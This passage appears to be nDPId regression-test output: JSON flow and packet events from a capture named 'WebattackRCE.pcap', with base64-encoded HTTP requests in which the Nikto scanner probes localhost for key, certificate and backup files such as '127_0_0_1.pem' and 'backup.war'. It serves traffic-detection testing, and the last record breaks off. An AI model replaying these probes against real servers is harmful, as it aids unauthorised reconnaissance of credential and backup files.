+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1576420277086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277086,"pkt":"AAAAAAAAAAAAAAAACABFAADF4EhAAEAGW+h\/AAABfwAAAcOgH5AMu9gyVttcv4AYAED+uQAAAQEICp1m\/IadZvyGR0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1576420277087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277087,"pkt":"AAAAAAAAAAAAAAAACABFAADFByZAAEAGNQt\/AAABfwAAAcOiH5Ca4D9dxFiRCIAYAED+uQAAAQEICp1m\/IedZvyHR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1576420277089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277089,"pkt":"AAAAAAAAAAAAAAAACABFAADFHRdAAEAGHxp\/AAABfwAAAcOkH5BFAiVuc2g7y4AYAED+uQAAAQEICp1m\/ImdZvyJR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1576420277090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277090,"pkt":"AAAAAAAAAAAAAAAACABFAADCB4tAAEAGNKl\/AAABfwAAAcOmH5BcnD\/ywDswlIAYAED+tgAAAQEICp1m\/IqdZvyKR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1576420277091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277091,"pkt":"AAAAAAAAAAAAAAAACABFAADCHJtAAEAGH5l\/AAABfwAAAcOoH5BLfyTh3iqQcIAYAED+tgAAAQEICp1m\/IudZvyLR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1576420277093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277093,"pkt":"AAAAAAAAAAAAAAAACABFAADCo9lAAEAGmFp\/AAABfwAAAcOqH5B0iJuvJFRwg4AYAED+tgAAAQEICp1m\/IydZvyMR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1576420277094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277094,"pkt":"AAAAAAAAAAAAAAAACABFAADCBM1AAEAGN2d\/AAABfwAAAcOsH5CyHDyzBNbaOYAYAED+tgAAAQEICp1m\/I6dZvyOR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1576420277096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277096,"pkt":"AAAAAAAAAAAAAAAACABFAADCcsRAAEAGyW9\/AAABfwAAAcOuH5Drmkq5YpvrhoAYAED+tgAAAQEICp1m\/JCdZvyQR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1576420277098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277098,"pkt":"AAAAAAAAAAAAAAAACABFAADCRRhAAEAG9xt\/AAABfwAAAcOwH5DRhn1t\/ojAOIAYAED+tgAAAQEICp1m\/JGdZvyRR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1576420277100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277100,"pkt":"AAAAAAAAAAAAAAAACABFAAC931JAAEAGXOZ\/AAABfwAAAcOyH5BYxOcsixzBAIAYAED+sQAAAQEICp1m\/JSdZvyUR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1576420277106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277106,"pkt":"AAAAAAAAAAAAAAAACABFAAC9aFtAAEAG091\/AAABfwAAAcO0H5ATAFAmoohjQYAYAED+sQAAAQEICp1m\/JqdZvyaR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 